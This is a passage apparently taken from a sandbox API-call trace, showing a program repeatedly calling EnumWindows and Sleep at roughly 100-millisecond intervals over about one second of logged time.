(lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.848] Sleep (dwMilliseconds=0x64) [0126.971] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.971] Sleep (dwMilliseconds=0x64) [0127.056] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.056] Sleep (dwMilliseconds=0x64) [0127.058] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.059] Sleep (dwMilliseconds=0x64) [0127.060] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.060] Sleep (dwMilliseconds=0x64) [0127.061] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.061] Sleep (dwMilliseconds=0x64) [0127.063] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.063] Sleep (dwMilliseconds=0x64) [0127.064] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.064] Sleep (dwMilliseconds=0x64) [0127.067] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.068] Sleep (dwMilliseconds=0x64) [0127.069] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.069] Sleep (dwMilliseconds=0x64) [0127.070] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.071] Sleep (dwMilliseconds=0x64) [0127.203] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.203] Sleep (dwMilliseconds=0x64) [0127.205] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.205] Sleep (dwMilliseconds=0x64) [0127.206] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.206] Sleep (dwMilliseconds=0x64) [0127.208] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.208] Sleep (dwMilliseconds=0x64) [0127.209] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.209] Sleep (dwMilliseconds=0x64) [0127.212] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.213] Sleep (dwMilliseconds=0x64) [0127.214] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.215] Sleep (dwMilliseconds=0x64) [0127.216] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.216] Sleep (dwMilliseconds=0x64) [0127.218] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.218] Sleep (dwMilliseconds=0x64) [0127.220] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.220] Sleep (dwMilliseconds=0x64) [0127.221] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.221] Sleep (dwMilliseconds=0x64) [0127.223] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.223] Sleep (dwMilliseconds=0x64) [0127.224] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.224] Sleep (dwMilliseconds=0x64) [0127.226] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.226] Sleep (dwMilliseconds=0x64) [0127.231] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.231] Sleep (dwMilliseconds=0x64) [0127.232] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.232] Sleep (dwMilliseconds=0x64) [0127.234] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.234] Sleep (dwMilliseconds=0x64) [0127.235] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.235] Sleep (dwMilliseconds=0x64) [0127.237] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.237] Sleep (dwMilliseconds=0x64) [0127.239] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.239] Sleep (dwMilliseconds=0x64) [0127.240] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.244] Sleep (dwMilliseconds=0x64) [0127.246] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.246] Sleep (dwMilliseconds=0x64) [0127.248] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.248] Sleep (dwMilliseconds=0x64) [0127.249] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.249] Sleep (dwMilliseconds=0x64) [0127.251] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.251] Sleep (dwMilliseconds=0x64) [0127.252] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.252] Sleep (dwMilliseconds=0x64) [0127.254] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.254] Sleep (dwMilliseconds=0x64) [0127.255] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.255] Sleep (dwMilliseconds=0x64) [0127.257] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.257] Sleep (dwMilliseconds=0x64) [0127.259] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.259] Sleep (dwMilliseconds=0x64) [0127.260] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.260] Sleep (dwMilliseconds=0x64) [0127.262] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.262] Sleep (dwMilliseconds=0x64) [0127.263] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.263] Sleep (dwMilliseconds=0x64) [0127.265] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.265] Sleep (dwMilliseconds=0x64) [0127.266] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.266] Sleep (dwMilliseconds=0x64) [0127.268] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.268] Sleep (dwMilliseconds=0x64) [0127.269] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.269] Sleep (dwMilliseconds=0x64) [0127.271] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.271] Sleep (dwMilliseconds=0x64) [0127.275] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.275] Sleep (dwMilliseconds=0x64) [0127.276] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.276] Sleep (dwMilliseconds=0x64) [0127.278] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.278] Sleep (dwMilliseconds=0x64) [0127.279] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.279] Sleep (dwMilliseconds=0x64) [0127.281] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.281] Sleep (dwMilliseconds=0x64) [0127.283] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.283] Sleep (dwMilliseconds=0x64) [0127.284] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.284] Sleep (dwMilliseconds=0x64) [0127.286] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.286] Sleep (dwMilliseconds=0x64) [0127.288] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.288] Sleep (dwMilliseconds=0x64) [0127.289] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.289] Sleep (dwMilliseconds=0x64) [0127.291] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.291] Sleep (dwMilliseconds=0x64) [0127.292] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.292] Sleep (dwMilliseconds=0x64) [0127.294] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.294] Sleep (dwMilliseconds=0x64) [0127.295] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.295] Sleep (dwMilliseconds=0x64) [0127.297] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.297] Sleep (dwMilliseconds=0x64) [0127.306] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.307] Sleep (dwMilliseconds=0x64) [0127.327] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.327] Sleep (dwMilliseconds=0x64) [0127.329] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.329] Sleep (dwMilliseconds=0x64) [0127.331] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.331] Sleep (dwMilliseconds=0x64) [0127.354] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.354] Sleep (dwMilliseconds=0x64) [0127.355] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.355] Sleep (dwMilliseconds=0x64) [0127.357] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.357] Sleep (dwMilliseconds=0x64) [0127.414] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.414] Sleep (dwMilliseconds=0x64) [0127.418] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.418] Sleep (dwMilliseconds=0x64) [0127.420] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.421] Sleep (dwMilliseconds=0x64) [0127.422] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.423] Sleep (dwMilliseconds=0x64) [0127.425] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.425] Sleep (dwMilliseconds=0x64) [0127.428] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.428] Sleep (dwMilliseconds=0x64) [0127.429] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.429] Sleep (dwMilliseconds=0x64) [0127.431] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.431] Sleep (dwMilliseconds=0x64) [0127.433] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.434] Sleep (dwMilliseconds=0x64) [0127.436] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.436] Sleep (dwMilliseconds=0x64) [0127.437] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.437] Sleep (dwMilliseconds=0x64) [0127.439] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.439] Sleep (dwMilliseconds=0x64) [0127.440] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.440] Sleep (dwMilliseconds=0x64) [0127.443] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.443] Sleep (dwMilliseconds=0x64) [0127.445] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.445] Sleep (dwMilliseconds=0x64) [0127.448] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.448] Sleep (dwMilliseconds=0x64) [0127.450] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.450] Sleep (dwMilliseconds=0x64) [0127.451] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.451] Sleep (dwMilliseconds=0x64) [0127.453] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.453] Sleep (dwMilliseconds=0x64) [0127.454] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.454] Sleep (dwMilliseconds=0x64) [0127.456] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.457] Sleep (dwMilliseconds=0x64) [0127.458] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.458] Sleep (dwMilliseconds=0x64) [0127.460] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.460] Sleep (dwMilliseconds=0x64) [0127.461] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.461] Sleep (dwMilliseconds=0x64) [0127.464] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.464] Sleep (dwMilliseconds=0x64) [0127.465] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.465] Sleep (dwMilliseconds=0x64) [0127.467] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.467] Sleep (dwMilliseconds=0x64) [0127.469] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.469] Sleep (dwMilliseconds=0x64) [0127.470] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.471] Sleep (dwMilliseconds=0x64) [0127.473] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.474] Sleep (dwMilliseconds=0x64) [0127.476] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.476] Sleep (dwMilliseconds=0x64) [0127.481] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.481] Sleep (dwMilliseconds=0x64) [0127.483] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.483] Sleep (dwMilliseconds=0x64) [0127.485] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.485] Sleep (dwMilliseconds=0x64) [0127.488] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.488] Sleep (dwMilliseconds=0x64) [0127.498] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.498] Sleep (dwMilliseconds=0x64) [0127.502] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.502] Sleep (dwMilliseconds=0x64) [0127.504] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.504] Sleep (dwMilliseconds=0x64) [0127.505] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.505] Sleep (dwMilliseconds=0x64) [0127.507] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.507] Sleep (dwMilliseconds=0x64) [0127.508] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.508] Sleep (dwMilliseconds=0x64) [0127.510] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.510] Sleep (dwMilliseconds=0x64) [0127.512] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.512] Sleep (dwMilliseconds=0x64) [0127.513] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.513] Sleep (dwMilliseconds=0x64) [0127.563] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.563] Sleep (dwMilliseconds=0x64) [0127.565] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.565] Sleep (dwMilliseconds=0x64) [0127.567] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.567] Sleep (dwMilliseconds=0x64) [0127.569] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.569] Sleep (dwMilliseconds=0x64) [0127.570] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.571] Sleep (dwMilliseconds=0x64) [0127.602] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.605] Sleep (dwMilliseconds=0x64) [0127.646] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.646] Sleep (dwMilliseconds=0x64) [0127.647] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.648] Sleep (dwMilliseconds=0x64) [0127.650] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.650] Sleep (dwMilliseconds=0x64) [0127.651] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.651] Sleep (dwMilliseconds=0x64) [0127.652] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.653] Sleep (dwMilliseconds=0x64) [0127.654] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.654] Sleep (dwMilliseconds=0x64) [0127.661] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.661] Sleep (dwMilliseconds=0x64) [0127.663] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.663] Sleep (dwMilliseconds=0x64) [0127.664] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.665] Sleep (dwMilliseconds=0x64) [0127.666] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.666] Sleep (dwMilliseconds=0x64) [0127.690] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.691] Sleep (dwMilliseconds=0x64) [0127.696] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.696] Sleep (dwMilliseconds=0x64) [0127.701] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.702] Sleep (dwMilliseconds=0x64) [0127.704] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.704] Sleep (dwMilliseconds=0x64) [0127.706] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.706] Sleep (dwMilliseconds=0x64) [0127.707] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.707] Sleep (dwMilliseconds=0x64) [0127.715] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.715] Sleep (dwMilliseconds=0x64) [0127.717] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.717] Sleep (dwMilliseconds=0x64) [0127.718] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.718] Sleep (dwMilliseconds=0x64) [0127.720] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.720] Sleep (dwMilliseconds=0x64) [0127.721] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.721] Sleep (dwMilliseconds=0x64) [0127.724] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.724] Sleep (dwMilliseconds=0x64) [0127.725] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.726] Sleep (dwMilliseconds=0x64) [0127.727] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.727] Sleep (dwMilliseconds=0x64) [0127.734] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.734] Sleep (dwMilliseconds=0x64) [0127.736] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.736] Sleep (dwMilliseconds=0x64) [0127.737] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.737] Sleep (dwMilliseconds=0x64) [0127.743] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.743] Sleep (dwMilliseconds=0x64) [0127.744] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.744] Sleep (dwMilliseconds=0x64) [0127.747] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.762] Sleep (dwMilliseconds=0x64) [0127.827] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.828] Sleep (dwMilliseconds=0x64) [0127.830] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.830] Sleep (dwMilliseconds=0x64) [0127.831] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.832] Sleep (dwMilliseconds=0x64) [0127.833] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.833] Sleep (dwMilliseconds=0x64) [0127.835] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.835] Sleep (dwMilliseconds=0x64) [0127.837] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.837] Sleep (dwMilliseconds=0x64) [0127.839] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.839] Sleep (dwMilliseconds=0x64) [0127.840] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.841] Sleep (dwMilliseconds=0x64) [0127.842] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.842] Sleep (dwMilliseconds=0x64) [0127.843] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.844] Sleep (dwMilliseconds=0x64) [0127.845] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.845] Sleep (dwMilliseconds=0x64) [0127.847] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.847] Sleep (dwMilliseconds=0x64) [0127.849] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.849] Sleep (dwMilliseconds=0x64) [0127.861] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.861] Sleep (dwMilliseconds=0x64) [0127.863] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.863] Sleep (dwMilliseconds=0x64) [0127.865] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.865] Sleep (dwMilliseconds=0x64) [0127.867] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.867] Sleep (dwMilliseconds=0x64) [0127.873] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.873] Sleep (dwMilliseconds=0x64) [0127.875] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.875] Sleep (dwMilliseconds=0x64) [0127.877] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.877] Sleep (dwMilliseconds=0x64) [0127.885] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.885] Sleep (dwMilliseconds=0x64) [0127.888] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.888] Sleep (dwMilliseconds=0x64) [0127.890] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.890] Sleep (dwMilliseconds=0x64) [0127.893] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.893] Sleep (dwMilliseconds=0x64) [0127.894] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.895] Sleep (dwMilliseconds=0x64) [0127.896] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.896] Sleep (dwMilliseconds=0x64) [0127.897] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.898] Sleep (dwMilliseconds=0x64) [0127.899] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.899] Sleep (dwMilliseconds=0x64) [0127.900] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.901] Sleep (dwMilliseconds=0x64) [0127.902] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.902] Sleep (dwMilliseconds=0x64) [0127.904] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.905] Sleep (dwMilliseconds=0x64) [0127.908] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.908] Sleep (dwMilliseconds=0x64) [0127.909] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.910] Sleep (dwMilliseconds=0x64) [0127.911] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.911] Sleep (dwMilliseconds=0x64) [0127.913] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.914] Sleep (dwMilliseconds=0x64) [0127.916] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.916] Sleep (dwMilliseconds=0x64) [0127.918] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.918] Sleep (dwMilliseconds=0x64) [0127.919] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.920] Sleep (dwMilliseconds=0x64) [0127.921] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.922] Sleep (dwMilliseconds=0x64) [0127.923] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.923] Sleep (dwMilliseconds=0x64) [0127.924] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.925] Sleep (dwMilliseconds=0x64) [0127.926] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.926] Sleep (dwMilliseconds=0x64) [0127.928] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.928] Sleep (dwMilliseconds=0x64) [0127.930] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.930] Sleep (dwMilliseconds=0x64) [0127.932] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.932] Sleep (dwMilliseconds=0x64) [0127.934] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.935] Sleep (dwMilliseconds=0x64) [0127.936] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.936] Sleep (dwMilliseconds=0x64) [0127.938] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.938] Sleep (dwMilliseconds=0x64) [0127.939] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.940] Sleep (dwMilliseconds=0x64) [0127.941] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.941] Sleep (dwMilliseconds=0x64) [0127.942] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.943] Sleep (dwMilliseconds=0x64) [0127.944] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.944] Sleep (dwMilliseconds=0x64) [0127.948] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.948] Sleep (dwMilliseconds=0x64) [0127.949] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.950] Sleep (dwMilliseconds=0x64) [0127.951] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.951] Sleep (dwMilliseconds=0x64) [0127.952] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.953] Sleep (dwMilliseconds=0x64) [0127.954] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.954] Sleep (dwMilliseconds=0x64) [0127.955] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.956] Sleep (dwMilliseconds=0x64) [0127.957] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.957] Sleep (dwMilliseconds=0x64) [0127.958] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.959] Sleep (dwMilliseconds=0x64) [0127.960] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.960] Sleep (dwMilliseconds=0x64) [0127.962] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.962] Sleep (dwMilliseconds=0x64) [0127.966] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.966] Sleep (dwMilliseconds=0x64) [0127.968] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.968] Sleep (dwMilliseconds=0x64) [0127.969] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.969] Sleep (dwMilliseconds=0x64) [0127.971] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.971] Sleep (dwMilliseconds=0x64) [0127.973] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.973] Sleep (dwMilliseconds=0x64) [0127.974] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.974] Sleep (dwMilliseconds=0x64) [0127.976] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.976] Sleep (dwMilliseconds=0x64) [0127.978] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.978] Sleep (dwMilliseconds=0x64) [0127.979] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.979] Sleep (dwMilliseconds=0x64) [0127.981] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.981] Sleep (dwMilliseconds=0x64) [0127.982] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.982] Sleep (dwMilliseconds=0x64) [0127.984] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.984] Sleep (dwMilliseconds=0x64) [0127.985] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.985] Sleep (dwMilliseconds=0x64) [0127.987] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.987] Sleep (dwMilliseconds=0x64) [0127.989] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.989] Sleep (dwMilliseconds=0x64) [0127.991] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.991] Sleep (dwMilliseconds=0x64) [0127.992] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.992] Sleep (dwMilliseconds=0x64) [0127.994] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.994] Sleep (dwMilliseconds=0x64) [0127.996] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.996] Sleep (dwMilliseconds=0x64) [0127.998] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.998] Sleep (dwMilliseconds=0x64) [0127.999] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0127.999] Sleep (dwMilliseconds=0x64) [0128.001] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.001] Sleep (dwMilliseconds=0x64) [0128.002] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.002] Sleep (dwMilliseconds=0x64) [0128.004] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.004] Sleep (dwMilliseconds=0x64) [0128.006] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0128.006] Sleep (dwMilliseconds=0x64) [0128.008] EnumWindows 